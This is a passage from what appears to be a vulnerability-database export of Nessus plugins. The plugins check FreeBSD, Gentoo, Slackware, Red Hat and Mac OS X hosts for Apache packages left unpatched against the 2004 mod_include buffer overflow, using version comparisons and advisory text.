and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(37841);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0940\");\n\n script_name(english:\"FreeBSD : apache mod_include buffer overflow vulnerability (6e6a6b8a-2fde-11d9-b3a2-0050fc56d258)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", 
\n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a buffer overflow in a function used by mod_include that may\nenable a local user to gain privileges of a httpd child. Only users\nthat are able to create SSI documents can take advantage of that\nvulnerability.\"\n );\n # http://www.securitylab.ru/48807.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securitylab.ru/48807.html\"\n );\n # https://vuxml.freebsd.org/freebsd/6e6a6b8a-2fde-11d9-b3a2-0050fc56d258.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c17ce797\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ru-apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ru-apache+mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/10/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/11/06\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache<1.3.33\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl<1.3.32+2.8.21_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+ipv6<1.3.32+2.8.21_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_perl<=1.3.31\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+ipv6<1.3.33\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+ssl<=1.3.29.1.55\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ru-apache<1.3.33+30.21\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ru-apache+mod_ssl<1.3.33+30.21+2.8.22\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:51:52", "description": "The remote host is affected by the vulnerability described in GLSA-200411-03\n(Apache 1.3: Buffer overflow vulnerability in mod_include)\n\n A possible buffer overflow exists in the get_tag() function of\n mod_include.c.\n \nImpact :\n\n If Server 
Side Includes (SSI) are enabled, a local attacker may be able to\n run arbitrary code with the rights of an httpd child process by making use\n of a specially crafted document with malformed SSI.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "published": "2004-11-02T00:00:00", "title": "GLSA-200411-03 : Apache 1.3: Buffer overflow vulnerability in mod_include", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "modified": "2004-11-02T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:apache"], "id": "GENTOO_GLSA-200411-03.NASL", "href": "https://www.tenable.com/plugins/nessus/15606", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200411-03.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15606);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0940\");\n script_xref(name:\"GLSA\", value:\"200411-03\");\n\n script_name(english:\"GLSA-200411-03 : Apache 1.3: Buffer overflow vulnerability in mod_include\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200411-03\n(Apache 1.3: Buffer overflow vulnerability in mod_include)\n\n A possible buffer overflow exists in the get_tag() function of\n mod_include.c.\n \nImpact :\n\n If Server Side Includes (SSI) are enabled, a local attacker may be able to\n run arbitrary code with the rights of an httpd child process by making use\n of a specially crafted document with malformed SSI.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.apacheweek.com/features/security-13\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200411-03\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Apache users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/apache-1.3.32-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:apache\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/11/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/11/02\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/10/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/apache\", unaffected:make_list(\"ge 1.3.32-r1\"), vulnerable:make_list(\"lt 1.3.32-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Apache 1.3\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T09:10:16", "description": "New apache packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\nand -current to fix a security issue. Apache has been upgraded to\nversion 1.3.33 which fixes a buffer overflow which may allow local\nusers to execute arbitrary code as the apache user. 
The mod_ssl\npackage has also been upgraded to version 2.8.22_1.3.33.", "edition": 24, "published": "2005-07-13T00:00:00", "title": "Slackware 10.0 / 8.1 / 9.0 / 9.1 / current : apache+mod_ssl (SSA:2004-305-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "modified": "2005-07-13T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:8.1", "cpe:/o:slackware:slackware_linux:9.0", "cpe:/o:slackware:slackware_linux:9.1", "cpe:/o:slackware:slackware_linux:10.0", "cpe:/o:slackware:slackware_linux", "p-cpe:/a:slackware:slackware_linux:apache", "p-cpe:/a:slackware:slackware_linux:mod_ssl"], "id": "SLACKWARE_SSA_2004-305-01.NASL", "href": "https://www.tenable.com/plugins/nessus/18788", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2004-305-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18788);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0940\");\n script_xref(name:\"SSA\", value:\"2004-305-01\");\n\n script_name(english:\"Slackware 10.0 / 8.1 / 9.0 / 9.1 / current : apache+mod_ssl (SSA:2004-305-01)\");\n script_summary(english:\"Checks for updated packages in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New apache packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\nand -current to fix a security issue. Apache has been upgraded to\nversion 1.3.33 which fixes a buffer overflow which may allow local\nusers to execute arbitrary code as the apache user. 
The mod_ssl\npackage has also been upgraded to version 2.8.22_1.3.33.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.533785\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bbba9317\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache and / or mod_ssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/11/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/10/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif 
(!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"8.1\", pkgname:\"apache\", pkgver:\"1.3.33\", pkgarch:\"i386\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"8.1\", pkgname:\"mod_ssl\", pkgver:\"2.8.22_1.3.33\", pkgarch:\"i386\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"9.0\", pkgname:\"apache\", pkgver:\"1.3.33\", pkgarch:\"i386\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"9.0\", pkgname:\"mod_ssl\", pkgver:\"2.8.22_1.3.33\", pkgarch:\"i386\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"9.1\", pkgname:\"apache\", pkgver:\"1.3.33\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"9.1\", pkgname:\"mod_ssl\", pkgver:\"2.8.22_1.3.33\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"10.0\", pkgname:\"apache\", pkgver:\"1.3.33\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"10.0\", pkgname:\"mod_ssl\", pkgver:\"2.8.22_1.3.33\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"apache\", pkgver:\"1.3.33\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"mod_ssl\", pkgver:\"2.8.22_1.3.33\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:05:21", "description": "Updated 
apache and mod_ssl packages that fix various minor security\nissues and bugs in the Apache Web server are now available for Red Hat\nEnterprise Linux 2.1.\n\nThe Apache HTTP Server is a powerful, full-featured, efficient, and\nfreely-available Web server. The mod_ssl module provides strong\ncryptography for the Apache Web server via the Secure Sockets Layer\n(SSL) and Transport Layer Security (TLS) protocols.\n\nA buffer overflow was discovered in the mod_include module. This flaw\ncould allow a local user who is authorized to create server-side\ninclude (SSI) files to gain the privileges of a httpd child (user\n'apache'). The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2004-0940 to this issue.\n\nThe mod_digest module does not properly verify the nonce of a client\nresponse by using a AuthNonce secret. This could allow a malicious\nuser who is able to sniff network traffic to conduct a replay attack\nagainst a website using Digest protection. Note that mod_digest\nimplements an older version of the MD5 Digest Authentication\nspecification, which is known not to work with modern browsers. This\nissue does not affect mod_auth_digest. (CVE-2003-0987).\n\nAn issue has been discovered in the mod_ssl module when configured to\nuse the 'SSLCipherSuite' directive in a directory or location context.\nIf a particular location context has been configured to require a\nspecific set of cipher suites, then a client is able to access that\nlocation using any cipher suite allowed by the virtual host\nconfiguration. 
(CVE-2004-0885).\n\nSeveral bugs in mod_ssl were also discovered, including :\n\n - memory leaks in SSL variable handling\n\n - possible crashes in the dbm and shmht session caches\n\nRed Hat Enterprise Linux 2.1 users of the Apache HTTP Server should\nupgrade to these erratum packages, which contains Apache version\n1.3.27 with backported patches correcting these issues.", "edition": 28, "published": "2004-12-14T00:00:00", "title": "RHEL 2.1 : apache, mod_ssl (RHSA-2004:600)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0987", "CVE-2004-0885", "CVE-2004-0940"], "modified": "2004-12-14T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:mod_ssl", "p-cpe:/a:redhat:enterprise_linux:apache", "p-cpe:/a:redhat:enterprise_linux:apache-manual", "p-cpe:/a:redhat:enterprise_linux:apache-devel"], "id": "REDHAT-RHSA-2004-600.NASL", "href": "https://www.tenable.com/plugins/nessus/15960", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2004:600. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15960);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2003-0987\", \"CVE-2004-0885\", \"CVE-2004-0940\");\n script_xref(name:\"RHSA\", value:\"2004:600\");\n\n script_name(english:\"RHEL 2.1 : apache, mod_ssl (RHSA-2004:600)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated apache and mod_ssl packages that fix various minor security\nissues and bugs in the Apache Web server are now available for Red Hat\nEnterprise Linux 2.1.\n\nThe Apache HTTP Server is a powerful, full-featured, efficient, and\nfreely-available Web server. The mod_ssl module provides strong\ncryptography for the Apache Web server via the Secure Sockets Layer\n(SSL) and Transport Layer Security (TLS) protocols.\n\nA buffer overflow was discovered in the mod_include module. This flaw\ncould allow a local user who is authorized to create server-side\ninclude (SSI) files to gain the privileges of a httpd child (user\n'apache'). The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2004-0940 to this issue.\n\nThe mod_digest module does not properly verify the nonce of a client\nresponse by using a AuthNonce secret. This could allow a malicious\nuser who is able to sniff network traffic to conduct a replay attack\nagainst a website using Digest protection. Note that mod_digest\nimplements an older version of the MD5 Digest Authentication\nspecification, which is known not to work with modern browsers. This\nissue does not affect mod_auth_digest. 
(CVE-2003-0987).\n\nAn issue has been discovered in the mod_ssl module when configured to\nuse the 'SSLCipherSuite' directive in a directory or location context.\nIf a particular location context has been configured to require a\nspecific set of cipher suites, then a client is able to access that\nlocation using any cipher suite allowed by the virtual host\nconfiguration. (CVE-2004-0885).\n\nSeveral bugs in mod_ssl were also discovered, including :\n\n - memory leaks in SSL variable handling\n\n - possible crashes in the dbm and shmht session caches\n\nRed Hat Enterprise Linux 2.1 users of the Apache HTTP Server should\nupgrade to these erratum packages, which contains Apache version\n1.3.27 with backported patches correcting these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0987\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0940\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2004:600\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/03/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/12/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2004:600\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"apache-1.3.27-9.ent\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"apache-devel-1.3.27-9.ent\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"apache-manual-1.3.27-9.ent\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"mod_ssl-2.8.12-7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache / apache-devel / apache-manual / mod_ssl\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:25:05", "description": "The remote host is missing Security Update 2004-12-02. 
This security\nupdate contains a number of fixes for the following programs :\n\n - Apache\n - Apache2\n - AppKit\n - Cyrus IMAP\n - HIToolbox\n - Kerberos\n - Postfix\n - PSNormalizer\n - QuickTime Streaming Server\n - Safari\n - Terminal\n\nThese programs contain multiple vulnerabilities that could allow a\nremote attacker to execute arbitrary code.", "edition": 23, "published": "2004-12-02T00:00:00", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2004-12-02)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-1121", "CVE-2004-0644", "CVE-2004-1123", "CVE-2004-0786", "CVE-2004-0747", "CVE-2003-0987", "CVE-2004-0643", "CVE-2004-0885", "CVE-2004-1122", "CVE-2004-0804", "CVE-2004-1086", "CVE-2004-0642", "CVE-2004-0748", "CVE-2004-1088", "CVE-2004-1087", "CVE-2004-0803", "CVE-2004-1084", "CVE-2004-1081", "CVE-2004-0940", "CVE-2004-1082", "CVE-2004-0772", "CVE-2004-0174", "CVE-2004-1089", "CVE-2004-0488", "CVE-2004-1083", "CVE-2004-0492", "CVE-2003-0020", "CVE-2004-1085", "CVE-2004-0886", "CVE-2004-0751"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD20041202.NASL", "href": "https://www.tenable.com/plugins/nessus/15898", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3004) exit(0); # a large number of xrefs.\nif ( ! 
defined_func(\"bn_random\") ) exit(0);\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(15898);\n script_version (\"1.24\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\n\n script_cve_id(\"CVE-2004-1082\", \"CVE-2003-0020\", \"CVE-2003-0987\", \"CVE-2004-0174\", \"CVE-2004-0488\", \n \"CVE-2004-0492\", \"CVE-2004-0885\", \"CVE-2004-0940\", \"CVE-2004-1083\", \"CVE-2004-1084\", \n \"CVE-2004-0747\", \"CVE-2004-0786\", \"CVE-2004-0751\", \"CVE-2004-0748\", \"CVE-2004-1081\", \n \"CVE-2004-0803\", \"CVE-2004-0804\", \"CVE-2004-0886\", \"CVE-2004-1089\", \"CVE-2004-1085\", \n \"CVE-2004-0642\", \"CVE-2004-0643\", \"CVE-2004-0644\", \"CVE-2004-0772\", \"CVE-2004-1088\", \n \"CVE-2004-1086\", \"CVE-2004-1123\", \"CVE-2004-1121\", \"CVE-2004-1122\", \"CVE-2004-1087\");\n script_bugtraq_id(9921, 9930, 9571, 11471, 11360, 11469, 10508, 11802);\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2004-12-02)\");\n script_summary(english:\"Check for Security Update 2004-12-02\");\n \n script_set_attribute( attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes a security\nissue.\" );\n script_set_attribute( attribute:\"description\", value:\n\"The remote host is missing Security Update 